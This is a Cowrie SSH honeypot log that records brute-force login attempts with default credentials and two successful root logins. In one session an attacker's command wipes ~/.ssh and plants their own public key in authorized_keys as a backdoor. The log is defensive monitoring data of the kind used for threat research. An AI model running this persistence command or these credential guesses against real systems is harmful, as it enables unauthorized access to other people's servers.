{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:18:52.611762Z","src_ip":"212.227.125.160","session":"9ca7198dc20b"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"password","message":"login attempt [odoo/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:18:54.515767Z","src_ip":"212.227.125.160","session":"9ca7198dc20b"}
{"eventid":"cowrie.session.closed","duration":"301.2","message":"Connection lost after 301.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:55.889873Z","src_ip":"212.227.235.229","session":"3b1020f59a4b"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:56.076941Z","src_ip":"212.227.125.160","session":"9ca7198dc20b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57414,"dst_ip":"1.2.3.4","dst_port":22,"session":"4670bc95a1ff","protocol":"ssh","message":"New connection: 212.227.235.229:57414 (1.2.3.4:22) [session: 4670bc95a1ff]","sensor":"my-vps","timestamp":"2025-08-31T04:19:01.221909Z"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-31T04:19:05.195904Z","src_ip":"212.227.125.160","session":"d26110d79561"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:19:07.363320Z","src_ip":"212.227.235.229","session":"4670bc95a1ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:19:07.364324Z","src_ip":"212.227.235.229","session":"4670bc95a1ff"}
{"eventid":"cowrie.session.closed","duration":"34.3","message":"Connection lost after 34.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:19:11.483982Z","src_ip":"212.227.125.160","session":"d26110d79561"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-31T04:19:25.662459Z","src_ip":"212.227.235.229","session":"4670bc95a1ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35398,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcf63f9278ae","protocol":"ssh","message":"New connection: 212.227.125.160:35398 (1.2.3.4:22) [session: fcf63f9278ae]","sensor":"my-vps","timestamp":"2025-08-31T04:19:29.154270Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47966,"dst_ip":"1.2.3.4","dst_port":22,"session":"a07d13409d4e","protocol":"ssh","message":"New connection: 212.227.235.229:47966 (1.2.3.4:22) [session: a07d13409d4e]","sensor":"my-vps","timestamp":"2025-08-31T04:19:29.514053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:19:30.596361Z","src_ip":"212.227.235.229","session":"a07d13409d4e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:19:30.644264Z","src_ip":"212.227.235.229","session":"a07d13409d4e"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"password1","message":"login attempt [odoo/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:19:36.383146Z","src_ip":"212.227.235.229","session":"a07d13409d4e"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:19:38.154117Z","src_ip":"212.227.235.229","session":"a07d13409d4e"}
{"eventid":"cowrie.session.closed","duration":"44.6","message":"Connection lost after 44.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:19:45.842304Z","src_ip":"212.227.235.229","session":"4670bc95a1ff"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:19:47.456758Z","src_ip":"212.227.125.160","session":"fcf63f9278ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:19:47.457392Z","src_ip":"212.227.125.160","session":"fcf63f9278ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37714,"dst_ip":"1.2.3.4","dst_port":22,"session":"c348e9dfb23e","protocol":"ssh","message":"New connection: 212.227.125.160:37714 (1.2.3.4:22) [session: c348e9dfb23e]","sensor":"my-vps","timestamp":"2025-08-31T04:19:51.021528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:19:51.467731Z","src_ip":"212.227.125.160","session":"c348e9dfb23e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:19:51.468410Z","src_ip":"212.227.125.160","session":"c348e9dfb23e"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"password1","message":"login attempt [odoo/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:19:53.037060Z","src_ip":"212.227.125.160","session":"c348e9dfb23e"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:19:54.794239Z","src_ip":"212.227.125.160","session":"c348e9dfb23e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37824,"dst_ip":"1.2.3.4","dst_port":22,"session":"679df4029444","protocol":"ssh","message":"New connection: 212.227.235.229:37824 (1.2.3.4:22) [session: 679df4029444]","sensor":"my-vps","timestamp":"2025-08-31T04:19:59.464631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:19:59.465635Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:19:59.780414Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.login.success","username":"root","password":"147852369","message":"login attempt [root/147852369] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:20:01.076048Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:20:01.728253Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:20:01.729295Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:20:01.730807Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:20:02.050073Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:20:02.742628Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:20:02.743571Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:20:03.059343Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:20:03.060351Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37832,"dst_ip":"1.2.3.4","dst_port":22,"session":"66f22ad7df1a","protocol":"ssh","message":"New connection: 212.227.235.229:37832 (1.2.3.4:22) [session: 66f22ad7df1a]","sensor":"my-vps","timestamp":"2025-08-31T04:20:03.694140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:20:03.740497Z","src_ip":"212.227.235.229","session":"66f22ad7df1a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:20:04.058609Z","src_ip":"212.227.235.229","session":"66f22ad7df1a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:20:05.338688Z","src_ip":"212.227.235.229","session":"66f22ad7df1a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:20:06.661605Z","src_ip":"212.227.235.229","session":"66f22ad7df1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36236,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c13d3fd109f","protocol":"ssh","message":"New connection: 212.227.235.229:36236 (1.2.3.4:22) [session: 8c13d3fd109f]","sensor":"my-vps","timestamp":"2025-08-31T04:20:06.980205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:20:06.981236Z","src_ip":"212.227.235.229","session":"8c13d3fd109f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:20:07.298900Z","src_ip":"212.227.235.229","session":"8c13d3fd109f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:20:08.999045Z","src_ip":"212.227.235.229","session":"8c13d3fd109f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:20:09.318539Z","src_ip":"212.227.235.229","session":"8c13d3fd109f"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:20:09.322140Z","src_ip":"212.227.235.229","session":"679df4029444"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:20:15.411105Z","src_ip":"212.227.125.160","session":"fcf63f9278ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33210,"dst_ip":"1.2.3.4","dst_port":22,"session":"603a1ea73e69","protocol":"ssh","message":"New connection: 212.227.235.229:33210 (1.2.3.4:22) [session: 603a1ea73e69]","sensor":"my-vps","timestamp":"2025-08-31T04:20:20.604732Z"}
{"eventid":"cowrie.session.closed","duration":"51.8","message":"Connection lost after 51.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:20:20.929255Z","src_ip":"212.227.125.160","session":"fcf63f9278ae"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:20:28.484798Z","src_ip":"212.227.235.229","session":"603a1ea73e69"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ss